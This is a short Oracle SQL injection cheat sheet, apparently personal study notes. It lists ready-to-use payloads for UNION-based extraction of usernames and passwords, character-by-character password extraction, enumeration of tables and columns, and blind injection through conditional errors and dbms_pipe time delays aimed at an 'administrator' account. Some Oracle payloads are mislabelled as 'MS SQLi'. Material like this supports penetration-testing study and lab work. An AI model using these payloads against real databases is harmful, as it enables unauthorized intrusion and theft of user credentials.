Note: In UNION Statement we have to match the number of columns of first select statement so that's why we use one NULL in the payload you can modify that according to your requirements
String Concatenation
'string1' || 'string2'
SELECT username || ":" || password FROM users;
In a UNION SQLi Context
' UNION SELECT NULL,username || ":" || password FROM Users -- -
Substring
SELECT SUBSTR(password,2,1) FROM users
In the UNION SQLi context
' UNION SELECT SUBSTR(password,2,1) FROM users -- -
Comments
--comment
Database Contents
List All Tables
SELECT table_name FROM all_tables;
In a UNION Oracle SQLi context
' UNION SELECT NULL,table_name FROM all_tables -- -
List All Columns
SELECT column_name FROM all_tab_columns WHERE table_name = 'TABLE-NAME-HERE'
In UNION MS SQLi
' UNION SELECT column_name FROM all_tab_columns WHERE table_name = 'TABLE-NAME-HERE' -- -
Conditional Errors
SELECT CASE WHEN LENGTH(password) = 3 THEN TO_CHAR(1/0) ELSE NULL END FROM users WHERE username='administrator'
In UNION MS SQLi
' UNION SELECT NULL,NULL,CASE WHEN LENGTH(password)=FUZZ THEN TO_CHAR(1/0) ELSE NULL END FROM users WHERE username='administrator'
Time delays
dbms_pipe.receive_message(('a'),10)
Conditional Time delays
SELECT CASE WHEN (LENGTH(password) = 3) THEN 'a'||dbms_pipe.receive_message(('a'),10) ELSE NULL END FROM users where username = 'administrator'
In UNION Oracle SQLi
' UNION SELECT NULL,NULL,CASE WHEN (LENGTH(password) = 3) THEN 'a'||dbms_pipe.receive_message(('a'),10) ELSE NULL END FROM users where username = 'administrator'
